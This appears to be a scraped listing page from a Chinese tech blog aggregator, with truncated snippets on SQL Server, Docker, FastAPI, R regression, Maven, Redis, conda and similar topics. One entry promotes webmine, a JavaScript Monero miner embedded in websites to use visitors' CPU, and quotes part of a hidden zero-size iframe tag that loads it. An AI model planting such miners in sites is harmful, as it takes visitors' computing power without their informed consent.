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  • SQL Server 2019 snapshot agent error2022-08-06 23:35:33

    1、日志错误提示 Microsoft OLE DB Driver for SQL Server: Unable to load msoledbsqlr.rll due to either missing file or version mismatch. The application cannot continue. 2、原因分析 This appears to be a common issue. The advice you received about installing the

  • Docker 05 构建镜像发送到中央仓库2022-08-03 07:00:26

    前提:需要你有Docker用户,没有去Docker官网注册就行了。   # YOUR-USER-NAME==用户名称 docker tag getting-started YOUR-USER-NAME/getting-started # 登录Docker docker login -u YOUR-USER-NAME # 推送构建的镜像 docker push YOUR-USER-NAME/getting-started[:latest] #

  • fastapi project template -- fastapi scaffold2022-08-02 00:31:06

    FastAPI Project Template https://github.com/rochacbruno/fastapi-project-template fastapi框架的脚手架, 集成的技术都是fastapi作者推荐的: SQLModel -- sqlachemy 和 pydantic的集合 Typer -- CLI Poetry 提供 安装 打包 发布 功能 lint test format release mkdocs 容器 p

  • R语言定量方法:回归,虚拟变量和交互项,假设检验:F 检验、AIC 和 BIC分析学生成绩数据带自测题2022-07-24 11:33:44

    全文链接:http://tecdat.cn/?p=27578  原文出处:拓端数据部落公众号 回归假设 省略变量偏差 如果真实模型包括X 1 和X 2 ,但我们忘记了X 2,那么 - 在某些情况下 - 对X的估计将会有偏差。OVB 需要:cor( X 1, X 2)!= 0 和 cor( X 1, y ) != 0 同方差性 为了做出有效的推断,我们

  • GitLab:Your account has been blocked.2022-07-21 20:31:15

    使用git pull 出现“GitLab:Your account has been blocked.”错误 背景 多人使用服务器同一用户,在~/.ssh 目录下的公私钥是之前一个同事用自己的账号生成的,离职后账号被封,导致git不能正常使用。 解决 用自己账号重新生成公私钥,即可正常访问

  • webmine和crypto-webminer挖矿——一句<iframe width=0 height=0 frameborder=0 src='https://webmine.cz/2022-07-20 15:34:56

    https://webmine.cz/ XMR mining as a replacement to ads. We are offering a Javascript miner that can be embedded to your website. This way you can earn XMR with spare CPU power of your website users in the following three steps. We do support Integrated ad

  • The constant happiness is curiosity2022-07-18 20:04:38

    Conformity is the jailer of freedom and the enemy of growth. 从众是羁押自由的狱卒,是阻碍进步的敌人。 The constant happiness is curiosity. 求知欲是长久的快乐。 Nothing is so strong as gentleness, nothing so gentle as real strength. 没有什么比温柔更有力量,也没有

  • Try to run this command from the system terminal. Make sure that you use the correct version of 2022-07-17 20:37:05

          切换后,安装第三方库报错: Try to run this command from the system terminal. Make sure that you use the correct version of 'pip' installed for your Python interpreter located at 'C:\Users\zhuangjie\AppData\Local\Programs\Python\Python39\p

  • R语言线性回归模型拟合诊断异常值分析家庭燃气消耗量和卡路里实例带自测题2022-07-17 11:32:01

    原文链接:http://tecdat.cn/?p=27474  原文出处:拓端数据部落公众号 考虑我们从实验、事件等中观察到一些数据 y 的情况。我们将观察结果 y 解释为某个随机变量 Y 的实现: 统计模型是对未知参数 θ 的 Y 分布的规范。通常,观测值 y = (y1, . . . , yn) ∈ Rn 是一个向量,而 Y = (Y1, .

  • SpringBoot项目报错:“Error starting ApplicationContext. To display the conditions report re-run your appl2022-07-15 10:32:51

    SpringBoot项目报错:“Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.” 一、编译出问题 仔细看报出的问题,有没有如:“Description:…” 这样的字眼,没有 “描述”,如上图所示,这种情况下的操作:(如果是maven项目)1.

  • 解决'parent.relativePath' of POM xx(xx) points at xx instead of xx, please verify your proje2022-07-12 07:31:45

    记录我的解决办法: 项目拉下来,加载依赖后,pom.xml的 <project  标签报错出现'parent.relativePath' of POM xx(xx) points at xx instead of xx, please verify your project structure 发现引用的parent标签中没有表明真实路径地址   导致每个子模块都找不到父模块。 于是给所有

  • PL Class-The Future2022-07-10 19:31:31

    教师评语: it was a pleasure to talk to you today. You did a great job in our lesson today, especially with your conversation skills. Focus on your use of the verb tenses, it is an area in which you could improve.Andy. 清楚度 87 强项: Today your pronunciation

  • PaddlePaddle使用paddle.utils.run_check()检测出现PaddlePaddle meets some problem with 8 GPUs2022-07-07 10:03:10

    WARNING:root:PaddlePaddle meets some problem with 8 GPUs. This may be caused by: 1. There is not enough GPUs visible on your system 2. Some GPUs are occupied by other process now 3. NVIDIA-NCCL2 is not installed correctly on your system. Please follow ins

  • Rocklinux 8 Docke (not passed)2022-07-06 21:04:23

    How to Install Docker on Rocky Linux 8   Docker is a virtualization platform that allows you to create isolated development containers. Introduced in 2013, Docker provides the ability to easily run your applications on any machine regardless of operati

  • .NET 6 + EF Core + MySQL + Docker + Identity +MVC 学习笔记 (二)2022-07-05 23:36:17

    环境准备: 1、VS 2022 免费社区版 开工: 先实现 EF Core + MySQL + Identity 创建新项目 -> ASP.NET Core Web 应用 (MVC)       可以先不勾选Docker,后面再加,但是要用Identity 就需要勾上 配置HTTPS , 并选择身份验证类型为: 个人账户           默认情况下,是连接的本地SQLite

  • Ted2022-07-04 12:31:58

    Tips to improve your critical thinking  Every day, a sea of decisions stretches before us. Some are small and unimportant, but others have a larger impact on our lives. For example, which politician should I vote for? Should I try the latest diet craze? O

  • 人称代词2022-07-03 10:31:14

     主格  宾格  形物代  名物代 反身代   I  me  my  mine  myself  You  you  your  yours  yourself  He  him  his  his  himself she her her hers herself  It   it  its  its   itsself  We us  our   ours ourselves  you

  • SQLSyntaxErrorException: You have an error in your SQL syntax2022-06-25 05:34:54

    ### The error may involve com.example.bootjdbc220620.mapper.CityMapper.insert-Inline ### The error occurred while setting parameters ### SQL: INSERT into city('name','state','country') values(?,?,?) ### Cause: java.sql.SQLSyn

  • linux 配置开机启动服务2022-06-25 04:33:30

    需要替换{}成你自己的内容   第一步创建配置文件 sudo vim /lib/systemd/system/my.sevice    第二步复制模板文件 [Unit] Description=myservice [Service] Type=simple ExecStart=/bin/sh {your bash script path} ExecReload=/bin/kill -s HUP $MAINPID ExecStop=

  • NoSQL vs SQL Databases & mongDB_ 转发2022-06-21 08:37:20

    原文:NoSQL Vs SQL Databases | MongoDB    NoSQL (“non SQL” or “not only SQL”) databases were developed in the late 2000s with a focus on scaling, fast queries, allowing for frequent application changes, and making programming simpler for developers. Relat

  • Testing - Chapter 11-14 in SWE at Google (Edition 2)2022-06-20 11:33:40

    Testing Overview Why to test? Chapter 11 gives some reasons: Find bugs early. An equally important reason why you want to test your software is to support the ability to change. (change software with confidence) The act of writing tests also improves the

  • [AWS] Solve Error: Lambda Options Request UnAuthorized2022-06-19 05:00:07

    If you configure CORS (Cross-Origin Resource Sharing) for an API, API Gateway automatically sends a response to preflight OPTIONS requests, even if there isn't an OPTIONS route configured for your API. At this time, you might want to disable your OPT

  • redis.clients.jedis.exceptions.JedisDataException: ERR AUTH <password> called without any pass2022-06-18 22:03:55

    描述:java使用jedis连接服务器上的redis,遇到的报错。 问题: redis.clients.jedis.exceptions.JedisDataException: ERR AUTH <password> called without any password configured for the default user. Are you sure your configuration is correct? 翻译:没有为默认用户配置任何密

  • React基础中的单一标签包裹的问题2022-06-16 20:00:44

    先上一段代码: <div id="example"> </div function HelloMessage(props1) { return (<h1>Hello {props1.name}!</h1>); } const element = <HelloMessage name="maomin"/>; ReactDOM.render( element, docume

  • anaconda 中虚拟环境常用命令2022-06-15 17:04:11

    conda list:查看安装了哪些包。 conda install package_name(包名):安装包 conda env list 或 conda info -e:查看当前存在哪些虚拟环境 conda update conda:检查更新当前conda conda remove -n your_env_name(虚拟环境名称) --all, 删除环境; conda remove --name $your_env_name $pac


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